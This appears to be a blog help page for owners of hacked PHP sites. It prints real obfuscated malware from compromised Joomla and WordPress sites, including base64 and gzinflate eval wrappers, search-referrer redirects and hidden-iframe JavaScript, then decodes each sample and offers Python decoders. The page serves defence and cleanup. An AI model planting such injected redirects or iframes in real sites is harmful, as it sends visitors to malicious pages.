
"Aw Snap" My website has been hacked! Now what? A few tips from redleg.

Examples of malicious php code

PHP is a powerful scripting language, and its built-in base64 encode/decode functions let attackers obfuscate malicious code so that its purpose is not obvious on a quick read of the file. On PHP sites such as WordPress, Joomla, Drupal (and many other CMSs), base64 encoding is one of the most common techniques attackers use to hide injected code.

This simple line of code

$tmp=base64_encode('I am a really malicious line of code!');

base64 encodes the string "I am a really malicious line of code!". The line echo($tmp); prints the encoded string "SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ==" to the browser. The attacker then puts the encoded string into one of the site's pages, wrapped in base64_decode() and eval():

eval(base64_decode('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ=='));

When the page is requested the PHP runs on the server: eval() executes whatever the decoded string contains, and its output is added to the content sent to the user. While a site owner would instantly be suspicious of

I am a really malicious line of code!

the function of the base64 encoded version is not as clear. eval(base64_decode('...[seemingly random string]...')); is the most common form, but attackers also layer other PHP functions on top of it, such as

eval(gzinflate(base64_decode('...')));

eval(gzuncompress(base64_decode('...')));

eval(gzinflate(str_rot13(base64_decode('...'))));

PHP code executes on your server, and only the result of that execution is inserted into the HTML sent to the user's browser. If you open a page in a browser and view the source you will not see the PHP code, only whatever output the script generated. To find and remove the actual PHP code you will need to edit the files on your server. I have a tool online at Redleg's PHP base64 Decoder which will decode most base64 encoded strings of this kind.
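The following Python script, added here as an example (it is not Redleg's online decoder and not code taken from this page), does the same job offline: it recognises the eval(...) wrapper forms listed above, applies the matching decoders innermost-first exactly as PHP would, and repeats on the result so that nested ("double encoded") layers like the one later on this page come apart too, all without ever executing the attacker's PHP. The sample payloads are constructed inside the script (the redirect.invalid hostname is a placeholder); the page's own toy string is included as one of them.

```python
"""Peel eval(base64_decode()) / gzinflate / gzuncompress / str_rot13 wrappers statically.

Added example: decoding is done in Python so the attacker's PHP is never executed.
"""
import base64
import re
import zlib

# PHP's str_rot13 only touches ASCII letters; a byte translation table reproduces it exactly.
_ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)

# PHP decoder name -> bytes-to-bytes Python equivalent.
DECODERS = {
    # non-strict base64_decode() silently drops characters outside the alphabet
    "base64_decode": lambda b: base64.b64decode(re.sub(rb"[^A-Za-z0-9+/=]", b"", b)),
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE stream, no header
    "gzuncompress": lambda b: zlib.decompress(b),     # zlib-wrapped stream
    "str_rot13": lambda b: b.translate(_ROT13),
}

# Matches eval( f1( f2( ... ( 'literal' ) ... ) ) ); and captures the chain of function
# names as one group so they can be applied innermost-first, the order PHP evaluates them.
WRAPPER = re.compile(
    r"eval\s*\(\s*((?:(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(\s*)+)"
    r"(['\"])([^'\"]*)\2\s*\)+\s*;?"
)
_NAME = re.compile(r"[a-z0-9_]+")


def unwrap_once(php: str):
    """Decode the first wrapper found in php; returns (plaintext, chain) or None."""
    m = WRAPPER.search(php)
    if m is None:
        return None
    chain = _NAME.findall(m.group(1))          # outermost ... innermost
    data = m.group(3).encode("latin-1")
    for fn in reversed(chain):                 # innermost decoder runs first
        data = DECODERS[fn](data)
    return data.decode("latin-1"), chain       # latin-1 is lossless for arbitrary bytes


def peel(php: str, max_layers: int = 10) -> list:
    """Keep unwrapping until no wrapper is left; returns the plaintexts, outer to inner."""
    layers = []
    for _ in range(max_layers):
        try:
            result = unwrap_once(php)
        except (ValueError, zlib.error):       # corrupt or truncated literal: stop here
            break
        if result is None:
            break
        php, _chain = result
        layers.append(php)
    return layers


# --- Constructed samples (built here, not taken from a compromised site) --------------
def _deflate_raw(b: bytes) -> bytes:
    c = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw DEFLATE, i.e. PHP gzdeflate()
    return c.compress(b) + c.flush()

ENCODERS = {
    "base64_decode": base64.b64encode,
    "gzinflate": _deflate_raw,
    "gzuncompress": zlib.compress,
    "str_rot13": lambda b: b.translate(_ROT13),
}

def wrap(php: str, chain) -> str:
    """Build eval(f1(f2(...('literal')))); for a chain listed outermost-first."""
    data = php.encode("latin-1")
    for fn in chain:                           # encode outermost-first so decoding reverses it
        data = ENCODERS[fn](data)
    return "eval(%s('%s'%s);" % ("(".join(chain), data.decode("ascii"), ")" * len(chain))

INNER = 'header("Location: http://redirect.invalid/");\nexit();'   # placeholder payload
SAMPLE_TRIPLE = wrap(INNER, ["gzinflate", "str_rot13", "base64_decode"])
# "Double encoded": the gzinflate layer hides a second eval(base64_decode()) layer.
SAMPLE_DOUBLE = wrap("error_reporting(0);\n" + wrap(INNER, ["base64_decode"]),
                     ["gzinflate", "base64_decode"])
SAMPLE_PAGE = "eval(base64_decode('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ=='));"

if __name__ == "__main__":
    for name, sample in [("page", SAMPLE_PAGE), ("triple", SAMPLE_TRIPLE), ("double", SAMPLE_DOUBLE)]:
        for depth, text in enumerate(peel(sample), 1):
            print("%s layer %d:\n%s\n" % (name, depth, text))
```

Run it against a suspect file with peel(open(path, encoding="latin-1").read()); each returned layer is what eval() would have executed, and the last one is usually the readable redirect or iframe code. The regex only handles string literals passed directly to the decoders, so a payload that first stores the string in a variable (as the create_function example further down does) needs that variable's value pasted in by hand.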

The following base64 encoded PHP was found in the homepage, index.php, of a Joomla site, but this type of code can be found on any site running PHP.

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2FsYXBvdHJlbW5iYS5vc2EucGwvcmlmLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCn1lbHNlIHsNCmVjaG8gIjxpZnJhbWUgc3JjPSdodHRwOi8vcnRqaHRleWp0eWp0eWoub3JnZS5wbC9tZG0vJyBmcmFtZWJvcmRlcj0wIGhlaWdodD0xIHdpZHRoPTEgc2Nyb2xsaW5nPW5vPjwvaWZyYW1lPiI7DQp9DQoJfQ=="));

Which decodes to the following script --

error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie"))
{
if (!$trum)
{
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: hxxp://alapotremnba.osa.pl/rif/");
exit();
}
}
}
else
{
echo "<iframe src='hxxp://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
}

Now let's take a closer look at the code.

error_reporting(0); --> turns off PHP error reporting, so if anything in the payload breaks no warning is shown that would give it away.

Note: any time you see a PHP script start with

error_reporting(0); or error_reporting(E_ERROR | E_WARNING | E_PARSE); or ini_set('display_errors', "0");

you should be suspicious. Legitimate code occasionally does this too, but attackers rely on these lines so that a broken payload fails silently instead of printing an error the site owner would notice.

$trum=headers_sent(); --> sets the variable to true if the HTTP headers have already been sent to the requester (once they have, a header() redirect is no longer possible).

$referer=$_SERVER['HTTP_REFERER']; --> sets the variable to the referring page.

$ua=$_SERVER['HTTP_USER_AGENT']; --> sets the variable to the user agent in the request.

if (stristr($ua,"msie")) --> continue only if the string 'msie' appears (case-insensitively) in the user agent; MSIE is the token Internet Explorer puts in its user agent, so only IE visitors are targeted.

if (!$trum) --> continue only if headers have not been sent yet, so a redirect is still possible.

if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) --> continue only if the string yahoo, google or bing is in the URL of the referring page, i.e. the visitor arrived from a search results page.

if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")) --> intended to skip the redirect when the referring search used an operator such as site:, cache: or inurl:, the kind of query a webmaster or researcher runs when checking a site. Note the attacker's logic bug: because the three negated tests are joined with or, the condition is false only when all three strings are present in the referer, so a search using just one of those operators is still redirected.

header("Location: hxxp://alapotremnba.osa.pl/rif/"); --> redirects the visitor to the malicious site.

exit(); --> stops the script so nothing else is sent after the redirect header.

else --> this else belongs to the headers_sent() check: if headers have already been sent a redirect would fail and raise a PHP warning, so instead of redirecting the script adds a hidden 1x1 pixel iframe to the page.

echo "<iframe src='hxxp://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>"; --> writes the malicious iframe.

The following code examples are common conditional redirects found in the same way.

base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3Ni51aW9wcXcuamt1Yi5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==")

Which decodes to a conditional redirect. This variant casts a wider net than the first one: it keys on a long list of referers (several Russian search engines such as Yandex and Rambler, social networks, URL shorteners, and Google result-page URLs), and it excludes Internet Explorer 7 rather than targeting IE.

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm)
{
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag)
{
if (!stristr($uag,"MSIE 7.0"))
{
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com"))
{
if (!stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: hxxp:// www6 . uiopqw . jkub . com/");
exit();
}
}
}
}
}


eval(base64_decode("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7DQpwcmVnX21hdGNoICgiL3FcPSguKj8pJi8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfQ0KZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsNCnByZWdfbWF0Y2ggKCIvcFw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcHJvcHBlcmEuY28uY2MvP3E9Ii4ka2tbMV0pOw0KCQlleGl0KCk7DQp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImdvb2dsZSIpKSB7DQoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0h UVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpew0KCQlwcmVnX21hdGNoICgiL3FcPSguKikvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7DQoJCWlmIChzdHJpc3RyKCRra1sxXSwiJiIpKSB7DQoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOw0KCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRrZXkyWzFdKTsNCgkJfWVsc2Ugew0KCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7DQoJCX0NCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtleXdvcmQpOw0KCQlleGl0KCk7DQoJfQ0KDQp9"));

This one decodes to a redirect that also forwards the visitor's search keywords (the q= or p= parameter of the referring search URL) to the attacker's site, so the destination can serve a page matching what the visitor searched for:

if (stristr($_SERVER[HTTP_REFERER],"bing"))
{
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: hxxp:// proppera . co . cc /?q=".$kk[1]);
exit();
}
elseif (stristr($_SERVER[HTTP_REFERER],"yahoo"))
{
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: hxxp:// proppera . co . cc/?q=".$kk[1]);
exit();
}
elseif (stristr($_SERVER[HTTP_REFERER],"google"))
{
if (!stristr($_SERVER[HTTP_REFERER],".nu")
and !stristr($_SERVER[HTTP_REFERER],"site")
and !stristr($_SERVER[HTTP_REFERER],"inurl"))
{
preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
if (stristr($kk[1],"&"))
{
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urldecode($key2[1]);
}
else
{
$keyword=urldecode($kk[1]);
}
header("Location: hxxp:// proppera . co . cc /?q=".$keyword);
exit();
}
}


eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));

Which decodes to the same yahoo/google/bing check as the first example, with a different destination and the same or-instead-of-and bug in the operator check:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv)
{
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: hxxp:// buyordie . osa . pl/");
exit();
}
}
}

The following block of code is being found on a lot of WordPress sites. In most cases it has been redirecting search results to uniqtext.com/search.php?theme=[*search query used*]. The $wp_salt array is just a character lookup table: read off in the order of the indexes below, it spells out eval(gzinflate(base64_decode($v)));, so $wp_add_filter is an eval wrapper built with create_function() (itself a thin layer over eval; deprecated in PHP 7.2 and removed in PHP 8), and the long string passed to it on the last line is the compressed, base64 encoded payload.

$md5 = "a5d67011f6466a82320bc9bcbcaab8c5";
$wp_salt = array("n",'(','o',"l","d",'c','r','e','f',"v","$","_",';','g',"z","b",'t','6',")","s",'i','4','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[7].$wp_salt[9].$wp_salt[22].$wp_salt[3].
$wp_salt[1].$wp_salt[13].$wp_salt[14].$wp_salt[20].$wp_salt[0].
$wp_salt[8].$wp_salt[3].$wp_salt[22].$wp_salt[16].$wp_salt[7].
$wp_salt[1].$wp_salt[15].$wp_salt[22].$wp_salt[19].$wp_salt[7].
$wp_salt[17].$wp_salt[21].$wp_salt[11].$wp_salt[4].$wp_salt[7].
$wp_salt[5].$wp_salt[2].$wp_salt[4].$wp_salt[7].$wp_salt[1].
$wp_salt[10].$wp_salt[9].$wp_salt[18].$wp_salt[18].$wp_salt[18].
$wp_salt[12]);
$wp_add_filter('FZi3zoaMsYQvx7YoyEmWC3LOmeYIXnLO6erP93c0IK1mdvYZyisb/l1/7VQN2VH+O8/2ksD+ryh/c1H++19i2qLCeiliH4ApgAVMQYau3F32r98uNi45nQSIJNUEGSFKAIBXDd9B06LQ0LORUKbf3KKV jQeHMHgGOqoqyoNqLNYHyk/XnJ73um2b38HtRLjZ86P3WOLwh...... [snipped a bit] .......7PaEHk/TSye7MrKqpM1lUCzAjX5NwpW5X803CpCvkTWBYP7paOaRsiz+vr/BOf1F3TchA+ewJGrYPfrzliW6r984Z KT3qdN58EVdA6ZFNrgjTjevu6aExuKs8UE9pUnOYVVWwXWrV4lSe6zyxzR2zSYyCNrXdYEgLd//+9+//vOf//z3/wE=');
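To see what such a table spells out without running the file, the following Python (an added example, not part of the original page) parses the array definition and the $wp_salt[n] concatenation and reconstructs the string create_function() would compile. It assumes the simple layout shown above: an array() whose elements are quoted single characters and that ends at the first `);`, and a create_function() call whose two arguments are separated by the first comma after the opening parenthesis; the sample embedded in the script is the definition from this page with the payload line left out.

```python
"""Resolve character-table obfuscation such as $wp_salt[7].$wp_salt[9]... without running PHP."""
import re

# The definition and create_function() call from the sample above; the long payload passed to
# $wp_add_filter afterwards is not needed to recover the function body.
SAMPLE = r"""
$md5 = "a5d67011f6466a82320bc9bcbcaab8c5";
$wp_salt = array("n",'(','o',"l","d",'c','r','e','f',"v","$","_",';','g',"z","b",'t','6',")","s",'i','4','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[7].$wp_salt[9].$wp_salt[22].$wp_salt[3].
$wp_salt[1].$wp_salt[13].$wp_salt[14].$wp_salt[20].$wp_salt[0].
$wp_salt[8].$wp_salt[3].$wp_salt[22].$wp_salt[16].$wp_salt[7].
$wp_salt[1].$wp_salt[15].$wp_salt[22].$wp_salt[19].$wp_salt[7].
$wp_salt[17].$wp_salt[21].$wp_salt[11].$wp_salt[4].$wp_salt[7].
$wp_salt[5].$wp_salt[2].$wp_salt[4].$wp_salt[7].$wp_salt[1].
$wp_salt[10].$wp_salt[9].$wp_salt[18].$wp_salt[18].$wp_salt[18].
$wp_salt[12]);
"""

# $name = array( ... );   (assumption: the body contains no ");" of its own)
ARRAY_DEF = re.compile(r"\$(\w+)\s*=\s*array\((.*?)\);", re.S)
# one quoted element, single- or double-quoted
ELEMENT = re.compile(r"""(['"])(.*?)\1""")
# a $table[index] lookup or a quoted literal inside a "." concatenation
TOKEN = re.compile(r"""\$(\w+)\[(\d+)\]|(['"])(.*?)\3""")


def load_tables(php: str) -> dict:
    """Every $name = array('x','y',...) becomes name -> list of element strings."""
    return {name: [elem for _q, elem in ELEMENT.findall(body)]
            for name, body in ARRAY_DEF.findall(php)}


def resolve(expr: str, tables: dict) -> str:
    """Evaluate a concatenation of quoted literals and $table[index] lookups."""
    out = []
    for m in TOKEN.finditer(expr):
        if m.group(1):
            out.append(tables[m.group(1)][int(m.group(2))])
        else:
            out.append(m.group(4))
    return "".join(out)


def resolve_create_function(php: str):
    """Return (parameter list, body) that create_function() would compile, or None."""
    tables = load_tables(php)
    # assumption: first comma separates the two arguments, last ");" closes the call
    m = re.search(r"create_function\(\s*(.*?)\s*,\s*(.*)\);", php, re.S)
    if m is None:
        return None
    return resolve(m.group(1), tables), resolve(m.group(2), tables)


if __name__ == "__main__":
    params, body = resolve_create_function(SAMPLE)
    print("create_function('%s', '%s')" % (params, body))
```

Once the body is known, the remaining string is a plain base64-of-gzdeflate payload and can be inflated with the wrapper-peeling approach shown earlier on this page, by wrapping it in eval(gzinflate(base64_decode('...'))) by hand.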

On many sites hackers add a gzinflate layer on top of the base64 encoding, as in the following obfuscated PHP code

eval(gzinflate(base64_decode('3VZNc5swEP0rLRcgTBwkhIAh6qW99NxjJgfHhppMgm1Q6ok94bdXu5IwdmKHZnrodAbLeNndt19vzXU7a6qV/DIX36ayyOeiLjaf5p6fL8Tlatq0xfdaem5IqOtfxXlVepuqni83k/ly9vRY1NKXzfNO2TjrTeFMVs1SLuXzqniZTeVs4a3Xa3+33Qp3+uDm8P3LDbbbvG2F44Az4u9K4ZZu4Dbqs3xUx9fFtHHzUpTqFmRzdRRu/lIIuajam3LSPt21svEI8ZWr21wK91k9roUTTeIOPjGBI+xI3JGsY1kXMyVgKUgTOECJZXDHlKSjVGn3oqSL0Elkfh8pxxxQlAWIGOkYegTzKDU/eguFTlKENiFk2gyFBB2AmCqo2Eo4uIpNJscZxfwYQkkABW5pemTJwYpYxUiHrgM7gTOuVqnG1UEl+1R5R7MzoZJYRwBPwAXtSxETrKy6IAuFAU+pNcaI4CF6Tgdt0RFy1B7q9ocS61SYNdFuuQFFcWrdY2TYlUTXArxqRVWeUKth1BQu7BwcDC8MAw/Wt9h6J6a2iLLPW5tHe2VikiN2pnRlzlhwE3w2GNlBYVPji/dRWEnU9y/Ww4NYJlC8dM/1VNkS9n76fjCrZqqWGiVmQJLBkGhfllghppZCOtT2gGmwgRTziEIYLd27k/OllAg/R4WhANF16Cx9Ix8yknRv09VuAo5+cBPRzJJxBMWYodh+Gm0Jz+4mu2/OcLDfPLpEIc44Hy4/292k5zj0NDniejo5YrMeT/KfE/qtyr2iH0T3h0swdf002Udgfg+Q3uk94k6GvWQy4M1Nd7FgPXv2n9kSF8v4INRPdyof4sZJxb5KOQP/Sf/C+8vQM7E/FvsMZVRRAfzjYGBa9iLJ5e1M2lXD5X0nGnn9G98vp+Xy8arRJhXnwUnJK+CwN/diwreKNs2+CGbqv55U956l4sLj16SgFzUN/e3yvAF3zbXSgveO7dbv/AcJ1j7+fWVeQP+DQ==')));

which writes the following obfuscated JavaScript into the page

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new'qwe'.prototype} catch(qqq){zz='al';zz='v'+zz;ss='';if(1){f='f'+'r'+'om'+'Char';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n='3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5'.split('a~'.substr(1));for(i=0;i!=611;i++){j=i; ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(''+q);

which, once decoded, adds a hidden iframe to the pages on the site:

if (document.getElementsByTagName('body')[0])
{
iframer();
}
else
{
document.write("<iframe src='hxxp://motivemus.mooo.com/showthread.php?t=45122773' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'hxxp:// motivemus . mooo . com /showthread.php?t=45122773');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
